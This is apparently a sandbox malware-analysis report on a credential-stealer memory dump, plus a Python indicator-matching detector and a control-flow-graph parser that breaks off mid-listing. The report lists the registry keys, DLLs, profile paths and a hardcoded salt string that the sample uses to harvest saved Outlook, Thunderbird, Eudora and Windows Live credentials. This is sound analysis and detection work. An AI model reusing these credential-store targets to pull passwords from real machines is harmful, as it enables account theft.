34049->34051 34068 4070e3 strlen _mbscat _mbscpy _mbscat 34050->34068 34051->34031 34054 407f03 FindFirstFileA 34053->34054 34055 407f24 FindNextFileA 34053->34055 34056 407f3f 34054->34056 34057 407f46 strlen strlen 34055->34057 34058 407f3a 34055->34058 34056->34057 34060 407f7f 34056->34060 34057->34060 34061 407f76 34057->34061 34059 407f90 FindClose 34058->34059 
34059->34056 34060->34031 34069 4070e3 strlen _mbscat _mbscpy _mbscat 34061->34069 34064 407fa3 34063->34064 34065 407f99 FindClose 34063->34065 34064->34042 34065->34064 34066->34031 34067->34041 34068->34051 34069->34060 34070->33492 34071->33496 34072->33503 34073->33502 34074->33509 34075->33506 34076->33501 34421 43ffc8 18 API calls 34235 4281cc 15 API calls 34423 4383cc 110 API calls 34236 4275d3 41 API calls 34424 4153d3 22 API calls 34237 444dd7 _XcptFilter 34429 4013de 15 API calls 34431 425115 111 API calls 34432 43f7db 18 API calls 34435 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34239 4335ee 16 API calls 34437 429fef 11 API calls 34240 444deb _exit _c_exit 34438 40bbf0 138 API calls 34243 425115 79 API calls 34442 437ffa 22 API calls 34247 4021ff 14 API calls 34248 43f5fc 149 API calls 34443 40e381 9 API calls 34250 405983 40 API calls 34251 42b186 27 API calls 34252 427d86 76 API calls 34253 403585 20 API calls 34255 42e58e 18 API calls 34258 425115 75 API calls 34260 401592 8 API calls 33159 410b92 33162 410a6b 33159->33162 33161 410bb2 33163 410a77 33162->33163 33164 410a89 GetPrivateProfileIntA 33162->33164 33167 410983 memset _itoa WritePrivateProfileStringA 33163->33167 33164->33161 33166 410a84 33166->33161 33167->33166 34447 434395 16 API calls 34262 441d9c memcmp 34449 43f79b 119 API calls 34263 40c599 43 API calls 34450 426741 87 API calls 34267 4401a6 21 API calls 34269 426da6 memcpy memset memset memcpy 34270 4335a5 15 API calls 34272 4299ab memset memset memcpy memset memset 34273 40b1ab 8 API calls 34455 425115 76 API calls 34459 4113b2 18 API calls 34463 40a3b8 memset sprintf SendMessageA 34077 410bbc 34080 4109cf 34077->34080 34081 4109dc 34080->34081 34082 410a23 memset GetPrivateProfileStringA 34081->34082 34083 4109ea memset 34081->34083 34088 407646 strlen 34082->34088 34093 4075cd sprintf memcpy 34083->34093 34086 410a0c WritePrivateProfileStringA 34087 410a65 34086->34087 34089 40765a 34088->34089 34090 40765c 
34088->34090 34089->34087 34092 4076a3 34090->34092 34094 40737c strtoul 34090->34094 34092->34087 34093->34086 34094->34090 34275 40b5bf memset memset _mbsicmp

Control-flow Graph (function 4082cd-40841a)

APIs
• memset.MSVCRT ref: 0040832F
• memset.MSVCRT ref: 00408343
• memset.MSVCRT ref: 0040835F
• memset.MSVCRT ref: 00408376
• GetComputerNameA.KERNEL32(?,?), ref: 00408398
• GetUserNameA.ADVAPI32(?,?), ref: 004083AC
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
• strlen.MSVCRT ref: 004083E9
• strlen.MSVCRT ref: 004083F8
• memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
• String ID: 5$H$O$b$i$}$}
• API String ID: 1832431107-3760989150
• Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
• Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
• Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
• Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
APIs
• FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
• FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
• strlen.MSVCRT ref: 00407F5C
• strlen.MSVCRT ref: 00407F64
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: FileFindstrlen$FirstNext
• String ID: ACD
• API String ID: 379999529-620537770
• Opcode ID: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
• Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
• Opcode Fuzzy Hash: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
• Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00401E8B
                                                                                                                                                                                    • strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                                    • strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                    • strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                    • strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                    • memset.MSVCRT ref: 00401FB1
                                                                                                                                                                                    • atoi.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401FE0
                                                                                                                                                                                    • memset.MSVCRT ref: 00402003
                                                                                                                                                                                    • sprintf.MSVCRT ref: 00402030
                                                                                                                                                                                      • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                    • memset.MSVCRT ref: 00402086
                                                                                                                                                                                    • memset.MSVCRT ref: 0040209B
                                                                                                                                                                                    • strlen.MSVCRT ref: 004020A1
                                                                                                                                                                                    • strlen.MSVCRT ref: 004020AF
                                                                                                                                                                                    • strlen.MSVCRT ref: 004020E2
                                                                                                                                                                                    • strlen.MSVCRT ref: 004020F0
                                                                                                                                                                                    • memset.MSVCRT ref: 00402018
                                                                                                                                                                                      • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402181
                                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C
                                                                                                                                                                                      • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                                                                                                    • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                                                                    • API String ID: 1846531875-4223776976
                                                                                                                                                                                    • Opcode ID: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                                                                                                                    • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll,761F0A60,?,00000000,?,?,?,0040CF60,761F0A60), ref: 00404AB8
                                                                                                                                                                                      • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                                                                                      • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,761F0A60), ref: 00404ADE
                                                                                                                                                                                      • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                                                                                                    • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                                                                                                    • API String ID: 745651260-375988210
                                                                                                                                                                                    • Opcode ID: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                                                                                                    • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                                                                                                                    • Opcode Fuzzy Hash: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                                                                                                    • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                                                                                                    • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                                                                                                    • pstorec.dll, xrefs: 00403C30
                                                                                                                                                                                    • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                                                                                                    • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                                                                                                    • PStoreCreateInstance, xrefs: 00403C44
                                                                                                                                                                                    • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                                                                                                    • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                                                                                                    • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                                                                                                    • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                                                                                                    • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                                                                                                    • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                                                                                    • API String ID: 1197458902-317895162
                                                                                                                                                                                    • Opcode ID: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                                                                                                    • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                                                                                                                    • Opcode Fuzzy Hash: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
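The three entries above give away the payload's credential-harvesting targets through strings and late-bound imports alone: the Thunderbird and Eudora profile paths together with nss3.dll and sqlite3.dll, pstorec.dll loaded at run time with LoadLibraryA so that PStoreCreateInstance can be resolved by GetProcAddress, and the Outlook / Windows Messaging account keys; a later entry on this page adds the Software\Microsoft\IdentityCRL "Dynamic Salt" lookup. Those strings are usable triage indicators on their own. The script below is an added example, not Joe Sandbox or Remcos code: it groups the indicators copied from this report by credential store and flags a strings dump only when several stores are targeted, so that a lone nss3.dll or sqlite3.dll from a legitimate Mozilla install does not fire. The store grouping, the two-hits-per-store threshold, the two-store verdict and the sample string lists are this example's own assumptions.

```python
"""Group credential-store indicators from this report and score a strings dump.

Added example for this page, not Joe Sandbox or Remcos code. The indicator
strings are copied from the API/string entries of this dump; grouping them
by store and requiring two hits per store are this example's own choices.
"""
from collections import defaultdict

# Registry keys, paths, DLLs and API names the dump opens or resolves while
# looking for saved mail/web credentials (copied from the report entries).
CREDENTIAL_STORE_INDICATORS = {
    "Mozilla Thunderbird / Eudora profiles": [
        r"Software\Mozilla\Mozilla Thunderbird",
        r"%programfiles%\Mozilla Thunderbird",
        r"Thunderbird\Profiles",
        r"Mozilla\Profiles",
        r"Software\Qualcomm\Eudora\CommandLine",
        "nss3.dll",
        "sqlite3.dll",
    ],
    "Protected Storage (pstorec.dll)": [
        "pstorec.dll",
        "PStoreCreateInstance",
        "www.google.com/Please log in to your Gmail account",
        "www.google.com:443/Please log in to your Google Account",
    ],
    "Outlook / Windows Messaging account settings": [
        r"Software\Microsoft\Internet Account Manager\Accounts",
        r"Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts",
        r"Software\Microsoft\Office\15.0\Outlook\Profiles",
        r"Software\Microsoft\Office\16.0\Outlook\Profiles",
        r"Software\Microsoft\Windows Messaging Subsystem\Profiles",
        r"Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles",
    ],
    "Windows Live IdentityCRL credentials": [
        r"Software\Microsoft\IdentityCRL",
        "Dynamic Salt",
        "Creds",
    ],
}

# A single indicator (nss3.dll, sqlite3.dll, "Creds") is common in benign
# software, so a store only counts once two of its indicators are present.
MIN_HITS_PER_STORE = 2


def classify_strings(strings):
    """Return {store: sorted matched indicators} for every store with enough hits.

    Matching is case-insensitive substring matching, which copes with the
    junk prefixes and suffixes `strings` output attaches to embedded paths.
    """
    lowered = [s.lower() for s in strings]
    hits = defaultdict(set)
    for store, indicators in CREDENTIAL_STORE_INDICATORS.items():
        for indicator in indicators:
            needle = indicator.lower()
            if any(needle in s for s in lowered):
                hits[store].add(indicator)
    return {store: sorted(found) for store, found in hits.items()
            if len(found) >= MIN_HITS_PER_STORE}


def looks_like_mail_credential_harvester(strings, min_stores=2):
    """True when the strings cover at least `min_stores` distinct credential stores."""
    return len(classify_strings(strings)) >= min_stores


# Constructed sample: the kind of lines `strings` prints from this dump, with noise.
SAMPLE_DUMP_STRINGS = [
    "!This program cannot be run in DOS mode.",
    "Software\\Mozilla\\Mozilla Thunderbird",
    "%programfiles%\\Mozilla Thunderbird",
    "Thunderbird\\Profiles",
    "nss3.dll",
    "pstorec.dll",
    "PStoreCreateInstance",
    "Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles",
    "Software\\Microsoft\\Internet Account Manager\\Accounts",
    "Software\\Microsoft\\IdentityCRL",
    "Dynamic Salt",
    "/deleteregkey",
]

# Constructed contrast: a Mozilla-derived binary legitimately ships these DLLs.
SAMPLE_BENIGN_STRINGS = [
    "nss3.dll",
    "sqlite3.dll",
    "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
]

if __name__ == "__main__":
    for store, found in classify_strings(SAMPLE_DUMP_STRINGS).items():
        print(f"{store}: {', '.join(found)}")
    print("dump looks like harvester:", looks_like_mail_credential_harvester(SAMPLE_DUMP_STRINGS))
    print("benign looks like harvester:", looks_like_mail_credential_harvester(SAMPLE_BENIGN_STRINGS))
```

Run over a `strings` dump of the unpacked process memory, the constructed sample lights up all four stores; the benign list reaches the per-store threshold for the Mozilla group (nss3.dll plus sqlite3.dll) but only that one store, so the harvester verdict stays negative. Tune the thresholds against your own benign corpus before using this as a detection.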

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                     Control-flow graph nodes (basic block id, address range: calls -> successors):
                                                                                                                                                                                     • 231 44b49f-44b4b0: call 444e38, GetModuleHandleA -> 235, 236
                                                                                                                                                                                     • 235 444c87-444d00: __set_app_type, __p__fmode, __p__commode, call 444e34 -> 242, 243
                                                                                                                                                                                     • 236 444c68-444c73 -> 235, 237
                                                                                                                                                                                     • 237 444c75-444c85 -> 235
                                                                                                                                                                                     • 242 444d02-444d0d: __setusermatherr -> 243
                                                                                                                                                                                     • 243 444d0e-444d68: call 444e22, _initterm, __getmainargs, _initterm -> 246
                                                                                                                                                                                     • 246 444d6a-444d72 -> 247, 248
                                                                                                                                                                                     • 247 444d74-444d76 -> 246, 248
                                                                                                                                                                                     • 248 444d78-444d7b -> 249, 250
                                                                                                                                                                                     • 249 444d81-444d85 -> 251, 252
                                                                                                                                                                                     • 250 444d7d-444d7e -> 249
                                                                                                                                                                                     • 251 444d87-444d89 -> 250, 252
                                                                                                                                                                                     • 252 444d8b-444dc6: GetStartupInfoA, GetModuleHandleA, call 40cf44 -> 257, 258
                                                                                                                                                                                     • 257 444dcf-444e0f: _cexit, call 444e71 (no successors)
                                                                                                                                                                                     • 258 444dc8-444dc9: exit -> 257
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                    • String ID: h4ND
                                                                                                                                                                                    • API String ID: 3662548030-3825183422
                                                                                                                                                                                    • Opcode ID: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                                                                                                                    • Instruction ID: 35bbd85eb0bb2ce5e1f1b9c4bc8677619723fc104b62ea38f54f9f601267cc63
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                                                                                                                    • Instruction Fuzzy Hash: D941D3B5C023449FEB619FA4DC847AD7BB4FB49325B28412BE451A32A1D7788D41CB5C

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                     Control-flow graph nodes (basic block id, address range: calls -> successors):
                                                                                                                                                                                     • 262 40fb00-40fb35: call 44b090, RegOpenKeyExA -> 265, 266
                                                                                                                                                                                     • 265 40fc37-40fc3d (no successors)
                                                                                                                                                                                     • 266 40fb3b-40fb4f: RegOpenKeyExA -> 267, 268
                                                                                                                                                                                     • 267 40fb55-40fb7e: RegQueryValueExA -> 269, 270
                                                                                                                                                                                     • 268 40fc2d-40fc31: RegCloseKey -> 265
                                                                                                                                                                                     • 269 40fc23-40fc27: RegCloseKey -> 268
                                                                                                                                                                                     • 270 40fb84-40fb93: call 404734 -> 269, 273
                                                                                                                                                                                     • 273 40fb99-40fbd1: call 4047a5 -> 269, 276
                                                                                                                                                                                     • 276 40fbd3-40fbdb -> 277, 278
                                                                                                                                                                                     • 277 40fc19-40fc1d: LocalFree -> 269
                                                                                                                                                                                     • 278 40fbdd-40fc14: memcpy * 2, call 40f802 -> 277
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                    • memcpy.MSVCRT(?,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                                                                                                                      • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                                                                                      • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                                                                                                      • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                                      • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                                                                                    • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                                                                                                    • API String ID: 2768085393-1693574875
                                                                                                                                                                                    • Opcode ID: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                                                                                                                    • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                                                                                                                    • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
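The control-flow graphs in this report are embedded in the page as one text line of the form `control_flow_graph <id> <start>-<end> <labels> ... <a>-><b> ...`, which is awkward to read but easy to parse and worth parsing when triaging many functions. The following is an added example, not Joe Sandbox code, that turns that line into basic blocks and edges and answers the questions an analyst asks of the 0040FB00 function above: which blocks call which API and how often, which block is the single return block, and whether every block is reachable from the entry. The token conventions (`call <addr>` for an internal call, `<api> * <n>` for an API called n times in one block, `a->b` for an edge) are inferred from the two graph lines on this page and are an assumption; the embedded samples are the text form of those two graphs (the entry at 44b49f and the function at 0040FB00).

```python
"""Parse a Joe Sandbox control-flow-graph text line into blocks and edges.

Added example for this page; it is not Joe Sandbox code. The line format is
inferred from the two graph lines on this page and is an assumption:
whitespace-separated tokens, a node opens with `<id> <start>-<end>`, its
labels are API names, `call <addr>` for an internal call, or `<api> * <n>`
for an API called n times in the block, and `<a>-><b>` is an edge.
"""
import re
from collections import Counter, deque

RANGE_RE = re.compile(r"^[0-9a-f]+-[0-9a-f]+$")   # lowercase hex address range
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")


def parse_cfg(line):
    """Return (nodes, edges): nodes maps id -> {range, apis (Counter), calls}."""
    tokens = line.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    nodes, edges, current, last_api = {}, [], None, None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        edge = EDGE_RE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
            i += 1
        elif tok.isdigit() and RANGE_RE.match(nxt):       # "<id> <start>-<end>"
            start, end = nxt.split("-")
            current = {"range": (int(start, 16), int(end, 16)),
                       "apis": Counter(), "calls": []}
            nodes[int(tok)] = current
            last_api = None
            i += 2
        elif current is None:
            raise ValueError(f"label {tok!r} before the first node")
        elif tok == "call":                                # internal subroutine call
            current["calls"].append(nxt)
            i += 2
        elif tok == "*":                                   # "<api> * <n>": repeat count
            if last_api is None:
                raise ValueError("'*' without a preceding API label")
            current["apis"][last_api] += int(nxt) - 1
            i += 2
        else:                                              # imported API name
            current["apis"][tok] += 1
            last_api = tok
            i += 1
    return nodes, edges


def reachable(edges, start):
    """Set of block ids reachable from `start` by following edges."""
    succ = {}
    for src, dst in edges:
        succ.setdefault(src, []).append(dst)
    seen, todo = {start}, deque([start])
    while todo:
        for dst in succ.get(todo.popleft(), []):
            if dst not in seen:
                seen.add(dst)
                todo.append(dst)
    return seen


def exit_blocks(nodes, edges):
    """Blocks with no successor, i.e. where the function returns."""
    with_succ = {src for src, _ in edges}
    return sorted(i for i in nodes if i not in with_succ)


def api_histogram(nodes):
    """API call sites summed over all blocks (internal `call`s excluded)."""
    total = Counter()
    for node in nodes.values():
        total.update(node["apis"])
    return total


def blocks_calling(nodes, api):
    """Sorted ids of the blocks that call `api` at least once."""
    return sorted(i for i, node in nodes.items() if node["apis"][api])


# Constructed samples: the text form of the two graphs on this page.
SAMPLE_GRAPH_40FB00 = (
    "control_flow_graph 262 40fb00-40fb35 call 44b090 RegOpenKeyExA 265 40fc37-40fc3d "
    "262->265 266 40fb3b-40fb4f RegOpenKeyExA 262->266 267 40fb55-40fb7e RegQueryValueExA "
    "266->267 268 40fc2d-40fc31 RegCloseKey 266->268 269 40fc23-40fc27 RegCloseKey 267->269 "
    "270 40fb84-40fb93 call 404734 267->270 268->265 269->268 270->269 273 40fb99-40fbd1 "
    "call 4047a5 270->273 273->269 276 40fbd3-40fbdb 273->276 277 40fc19-40fc1d LocalFree "
    "276->277 278 40fbdd-40fc14 memcpy * 2 call 40f802 276->278 277->269 278->277"
)
SAMPLE_GRAPH_ENTRY = (
    "control_flow_graph 231 44b49f-44b4b0 call 444e38 GetModuleHandleA 235 444c87-444d00 "
    "__set_app_type __p__fmode __p__commode call 444e34 231->235 236 444c68-444c73 231->236 "
    "242 444d02-444d0d __setusermatherr 235->242 243 444d0e-444d68 call 444e22 _initterm "
    "__getmainargs _initterm 235->243 236->235 237 444c75-444c85 236->237 237->235 242->243 "
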